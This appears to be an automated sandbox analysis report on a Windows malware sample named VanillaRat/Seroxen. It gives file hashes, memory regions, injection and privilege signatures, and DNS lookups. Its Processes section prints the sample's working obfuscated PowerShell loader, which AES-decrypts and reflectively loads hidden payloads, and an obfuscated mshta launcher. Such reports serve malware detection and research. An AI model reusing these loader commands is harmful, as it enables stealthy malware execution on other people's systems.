memory/2688-42-0x000001E9EB0E0000-0x000001E9EB0F0000-memory.dmp
memory/2688-44-0x00007FFF03130000-0x00007FFF03BF1000-memory.dmp
memory/2688-46-0x000001E9EB0E0000-0x000001E9EB0F0000-memory.dmp
memory/2688-45-0x000001E9EB0E0000-0x000001E9EB0F0000-memory.dmp
memory/1784-47-0x0000000005350000-0x0000000005360000-memory.dmp
memory/2688-48-0x000001E9EB260000-0x000001E9EB3AE000-memory.dmp
memory/2688-49-0x000001E9EB0E0000-0x000001E9EB0F0000-memory.dmp
memory/2688-51-0x000001E990000000-0x000001E990024000-memory.dmp
memory/2688-52-0x00007FFF215B0000-0x00007FFF217A5000-memory.dmp
memory/2688-53-0x00007FFF21300000-0x00007FFF213BE000-memory.dmp
memory/2688-54-0x000001E9EB260000-0x000001E9EB3AE000-memory.dmp
memory/2688-55-0x000001E9802C0000-0x000001E980D0E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/2688-58-0x00007FFF0D6B0000-0x00007FFF0D6C9000-memory.dmp
memory/2688-59-0x000001E980D20000-0x000001E980DC4000-memory.dmp
memory/2688-60-0x000001E980DD0000-0x000001E980E26000-memory.dmp
memory/2688-61-0x000001E980E30000-0x000001E980E88000-memory.dmp
memory/2688-62-0x000001E980E90000-0x000001E980EB2000-memory.dmp
memory/2688-63-0x00007FFF215B0000-0x00007FFF217A5000-memory.dmp
memory/2688-65-0x000001E981170000-0x000001E98117A000-memory.dmp
memory/2500-66-0x0000000140000000-0x0000000140004000-memory.dmp
memory/2500-68-0x0000000140000000-0x0000000140004000-memory.dmp
memory/3100-69-0x0000000000400000-0x0000000000406000-memory.dmp
memory/3100-71-0x0000000000400000-0x0000000000406000-memory.dmp
C:\Windows\$sxr-powershell.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
C:\Windows\$sxr-mshta.exe
| MD5 | 0b4340ed812dc82ce636c00fa5c9bef2 |
| SHA1 | 51c97ebe601ef079b16bcd87af827b0be5283d96 |
| SHA256 | dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895 |
| SHA512 | d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045 |
memory/2688-79-0x000001E9EB260000-0x000001E9EB3AE000-memory.dmp
memory/2688-85-0x00007FFF215B0000-0x00007FFF217A5000-memory.dmp
memory/2688-86-0x00007FFF21300000-0x00007FFF213BE000-memory.dmp
memory/2688-94-0x000001E9EB260000-0x000001E9EB3AE000-memory.dmp
C:\Windows\$sxr-mshta.exe
| MD5 | 0b4340ed812dc82ce636c00fa5c9bef2 |
| SHA1 | 51c97ebe601ef079b16bcd87af827b0be5283d96 |
| SHA256 | dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895 |
| SHA512 | d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045 |
memory/2688-106-0x000001E9EB260000-0x000001E9EB3AE000-memory.dmp
memory/2688-107-0x00007FFF03130000-0x00007FFF03BF1000-memory.dmp
memory/2688-108-0x00007FFF0D6B0000-0x00007FFF0D6C9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a6c9d692ed2826ecb12c09356e69cc09 |
| SHA1 | def728a6138cf083d8a7c61337f3c9dade41a37f |
| SHA256 | a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b |
| SHA512 | 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3 |
memory/1084-112-0x000002A3EC590000-0x000002A3EC6DE000-memory.dmp
memory/1084-113-0x00007FFF03130000-0x00007FFF03BF1000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-10-11 20:13
Reported
2023-10-12 14:20
Platform
win10v2004-20230915-en
Max time kernel
120s
Max time network
155s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 228 created 624 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | C:\Windows\system32\winlogon.exe |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation | C:\Windows\$sxr-mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 228 set thread context of 4608 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 228 set thread context of 4948 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | C:\Windows\SysWOW64\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\$sxr-mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat"
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
"HandlerInstaller.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function VROas($YFEKm){ $EnJnq=[System.Security.Cryptography.Aes]::Create(); $EnJnq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $EnJnq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $EnJnq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+mgHoM3Dd8LE9FhelB1+E49NCwweh3qyJF1GxhCe+k0='); $EnJnq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wwm30jhzkHC4/5SnlEDZGA=='); $pWYkp=$EnJnq.CreateDecryptor(); $return_var=$pWYkp.TransformFinalBlock($YFEKm, 0, $YFEKm.Length); $pWYkp.Dispose(); $EnJnq.Dispose(); $return_var;}function XcsVC($YFEKm){ $zQqyq=New-Object System.IO.MemoryStream(,$YFEKm); $emglC=New-Object System.IO.MemoryStream; $RGlqr=New-Object System.IO.Compression.GZipStream($zQqyq, [IO.Compression.CompressionMode]::Decompress); $RGlqr.CopyTo($emglC); $RGlqr.Dispose(); $zQqyq.Dispose(); $emglC.Dispose(); $emglC.ToArray();}function dnTmn($YFEKm,$CaEDQ){ $NmIfY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$YFEKm); $bqkrl=$NmIfY.EntryPoint; $bqkrl.Invoke($null, $CaEDQ);}$lpRaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat').Split([Environment]::NewLine);foreach ($aneut in $lpRaC) { if ($aneut.StartsWith('SEROXEN')) { $zZPSp=$aneut.Substring(7); break; }}$jGZnr=[string[]]$zZPSp.Split('\');$yHwYZ=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[0])));$QcHAi=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[1])));dnTmn $QcHAi (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dnTmn $yHwYZ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{5282e4a7-6927-40ac-ab96-4852c15f2762}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{4ad4fd01-ec46-449a-8f0e-6b6a8a779ad9}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{a122e755-dbaa-4f17-a6d0-bfaac32acfce}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{6d605f28-3ab7-4550-bcae-35cb1d74d770}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{6638f5bf-7897-458e-a5fe-d5c01de1ba46}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-MkCCpgMZesGBgQjTHDjR4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-MkCCpgMZesGBgQjTHDjR4312:&#<?=%
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function UdTTc($fvgoo){ $sihCR=[System.Security.Cryptography.Aes]::Create(); $sihCR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $sihCR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $sihCR.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HCyEf1YafduI2gaayTiiJc0BcZzdl+wOYfZmYK/MNnc='); $sihCR.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KN9rIUT3LMorVQMyobJ55g=='); $TeypB=$sihCR.('rotpyrceDetaerC'[-1..-15] -join '')(); $dmEot=$TeypB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fvgoo, 0, $fvgoo.Length); $TeypB.Dispose(); $sihCR.Dispose(); $dmEot;}function rqQZg($fvgoo){ $ympdX=New-Object System.IO.MemoryStream(,$fvgoo); $YpWOM=New-Object System.IO.MemoryStream; $fxvtV=New-Object System.IO.Compression.GZipStream($ympdX, [IO.Compression.CompressionMode]::Decompress); $fxvtV.CopyTo($YpWOM); $fxvtV.Dispose(); $ympdX.Dispose(); $YpWOM.Dispose(); $YpWOM.ToArray();}function fbHSv($fvgoo,$amDjr){ $iypoS=[System.Reflection.Assembly]::Load([byte[]]$fvgoo); $mDfQt=$iypoS.EntryPoint; $mDfQt.Invoke($null, $amDjr);}$sihCR1 = New-Object System.Security.Cryptography.AesManaged;$sihCR1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$sihCR1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$sihCR1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HCyEf1YafduI2gaayTiiJc0BcZzdl+wOYfZmYK/MNnc=');$sihCR1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KN9rIUT3LMorVQMyobJ55g==');$khIZV = $sihCR1.('rotpyrceDetaerC'[-1..-15] -join '')();$QOKgA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l41V2WxL9jkprJcxS5Nj8A==');$QOKgA = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QOKgA, 0, $QOKgA.Length);$QOKgA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QOKgA);$gPPoi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aROoNBcsZ/PW5d2DYHVzdO8nR2VzRJCqHmYigLb6Jrs=');$gPPoi = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gPPoi, 0, $gPPoi.Length);$gPPoi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gPPoi);$YyGbR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OkYia47+jaf2xVNWbMpC2Q==');$YyGbR = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YyGbR, 0, $YyGbR.Length);$YyGbR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YyGbR);$NGxnm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UP/EOIJWq+4ghvON19uciyQbICBLdoMJpFC0ksKBSJnw4OjSJ3hNKvrvEz2D1CqWZeOjzkO6q7JNywlpjDo/HsSRUmq3ccngTHm9XJej3zwQT3J68V0tpZUrw5HlEx72QEBCzfoKwyEbutYu6tnr1aPtRABJ4gfBVc7hAGl7iFU1xOqulzEW9VCdQmV3l/XcqcwaWBGT4wqFMxb3ZLGT6dcBux6AJSpiqyO9qz1cMeCPoduh33z6ScFknrT57PjsKVugEp449IOSaJw/Zs5f9EG1eKOHsmSxGt55TMZKWpTlR+9ITlk1NoYWpUkwaocQ3BUDxHEdM58P2Tq0P5vFhBc7sNLjFZEo9FrrcNtCu/8C47g4vYoBrmKKGYmZBkTLyTUUtN/HfYPnelsAIjtdj976Vlk2ugGP1f2Y3nGeegA=');$NGxnm = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NGxnm, 0, $NGxnm.Length);$NGxnm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NGxnm);$zWEEc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('81O15VE8m4lB+MnqiTR1uA==');$zWEEc = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zWEEc, 0, $zWEEc.Length);$zWEEc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zWEEc);$eNHHL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BVmHLrMLSPnDAnkqy9pFoQ==');$eNHHL = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eNHHL, 0, $eNHHL.Length);$eNHHL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eNHHL);$qBjEF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pLtK/cPeeTiGMmymKQ6Fcw==');$qBjEF = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qBjEF, 0, $qBjEF.Length);$qBjEF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qBjEF);$pCyOn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2NYpuHYegPYo5qCfIlZhMQ==');$pCyOn = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pCyOn, 0, $pCyOn.Length);$pCyOn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pCyOn);$qGSgp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xFmRHuVf/LPmEPegX+g5Zw==');$qGSgp = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qGSgp, 0, $qGSgp.Length);$qGSgp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qGSgp);$QOKgA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6P/YK+QQ0JTDdLrribGmsA==');$QOKgA0 = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QOKgA0, 0, $QOKgA0.Length);$QOKgA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QOKgA0);$QOKgA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lIYWfiAlubjLUZJrugkuA==');$QOKgA1 = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QOKgA1, 0, $QOKgA1.Length);$QOKgA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QOKgA1);$QOKgA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('//+9JxvND8cXl6QyLO8bkA==');$QOKgA2 = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QOKgA2, 0, $QOKgA2.Length);$QOKgA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QOKgA2);$QOKgA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0KfLJH3W0jtfi/p3tJXm2Q==');$QOKgA3 = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QOKgA3, 0, $QOKgA3.Length);$QOKgA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QOKgA3);$khIZV.Dispose();$sihCR1.Dispose();if (@(get-process -ea silentlycontinue $QOKgA3).count -gt 1) {exit};$wGOvn = [Microsoft.Win32.Registry]::$pCyOn.$qBjEF($QOKgA).$eNHHL($gPPoi);$agzwV=[string[]]$wGOvn.Split('\');$alLGs=rqQZg(UdTTc([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($agzwV[1])));fbHSv $alLGs (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$vPzyo = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($agzwV[0]);$sihCR = New-Object System.Security.Cryptography.AesManaged;$sihCR.Mode = [System.Security.Cryptography.CipherMode]::CBC;$sihCR.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$sihCR.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HCyEf1YafduI2gaayTiiJc0BcZzdl+wOYfZmYK/MNnc=');$sihCR.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KN9rIUT3LMorVQMyobJ55g==');$TeypB = $sihCR.('rotpyrceDetaerC'[-1..-15] -join '')();$vPzyo = $TeypB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($vPzyo, 0, $vPzyo.Length);$TeypB.Dispose();$sihCR.Dispose();$ympdX = New-Object System.IO.MemoryStream(, $vPzyo);$YpWOM = New-Object System.IO.MemoryStream;$fxvtV = New-Object System.IO.Compression.GZipStream($ympdX, [IO.Compression.CompressionMode]::$QOKgA1);$fxvtV.$qGSgp($YpWOM);$fxvtV.Dispose();$ympdX.Dispose();$YpWOM.Dispose();$vPzyo = $YpWOM.ToArray();$GJmqW = $NGxnm | IEX;$iypoS = $GJmqW::$QOKgA2($vPzyo);$mDfQt = $iypoS.EntryPoint;$mDfQt.$QOKgA0($null, (, [string[]] ($YyGbR)))
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.120.234.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.57.101.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wmdfzols.wqo.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/228-13-0x0000026B278B0000-0x0000026B278D2000-memory.dmp
memory/228-14-0x00007FFE7E1A0000-0x00007FFE7EC61000-memory.dmp
memory/228-15-0x0000026B26E20000-0x0000026B26E30000-memory.dmp
memory/228-16-0x0000026B26E20000-0x0000026B26E30000-memory.dmp
memory/228-17-0x0000026B26E20000-0x0000026B26E30000-memory.dmp
memory/228-18-0x00007FFE7E1A0000-0x00007FFE7EC61000-memory.dmp
memory/228-19-0x0000026B26E20000-0x0000026B26E30000-memory.dmp
memory/228-20-0x0000026B26E20000-0x0000026B26E30000-memory.dmp
memory/228-21-0x0000026B26E20000-0x0000026B26E30000-memory.dmp
memory/228-22-0x0000026B0EC40000-0x0000026B0EC64000-memory.dmp
memory/228-23-0x00007FFE9DA50000-0x00007FFE9DC45000-memory.dmp
memory/228-24-0x00007FFE9CAB0000-0x00007FFE9CB6E000-memory.dmp
memory/228-25-0x0000026B27E50000-0x0000026B2889E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/228-27-0x00007FFE8A4A0000-0x00007FFE8A4B9000-memory.dmp
memory/228-28-0x0000026B288A0000-0x0000026B28944000-memory.dmp
memory/228-29-0x0000026B28950000-0x0000026B289A6000-memory.dmp
memory/228-30-0x0000026B289B0000-0x0000026B28A08000-memory.dmp
memory/228-31-0x0000026B0EC70000-0x0000026B0EC92000-memory.dmp
memory/228-32-0x00007FFE9DA50000-0x00007FFE9DC45000-memory.dmp
memory/228-34-0x0000026B26FA0000-0x0000026B26FAA000-memory.dmp
memory/4608-35-0x0000000140000000-0x0000000140004000-memory.dmp
memory/4608-37-0x0000000140000000-0x0000000140004000-memory.dmp
memory/4948-38-0x0000000000400000-0x0000000000406000-memory.dmp
memory/4948-40-0x0000000000400000-0x0000000000406000-memory.dmp
C:\Windows\$sxr-powershell.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
C:\Windows\$sxr-mshta.exe
| MD5 | 0b4340ed812dc82ce636c00fa5c9bef2 |
| SHA1 | 51c97ebe601ef079b16bcd87af827b0be5283d96 |
| SHA256 | dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895 |
| SHA512 | d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045 |
C:\Windows\$sxr-mshta.exe
| MD5 | 0b4340ed812dc82ce636c00fa5c9bef2 |
| SHA1 | 51c97ebe601ef079b16bcd87af827b0be5283d96 |
| SHA256 | dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895 |
| SHA512 | d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045 |
C:\Windows\$sxr-cmd.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
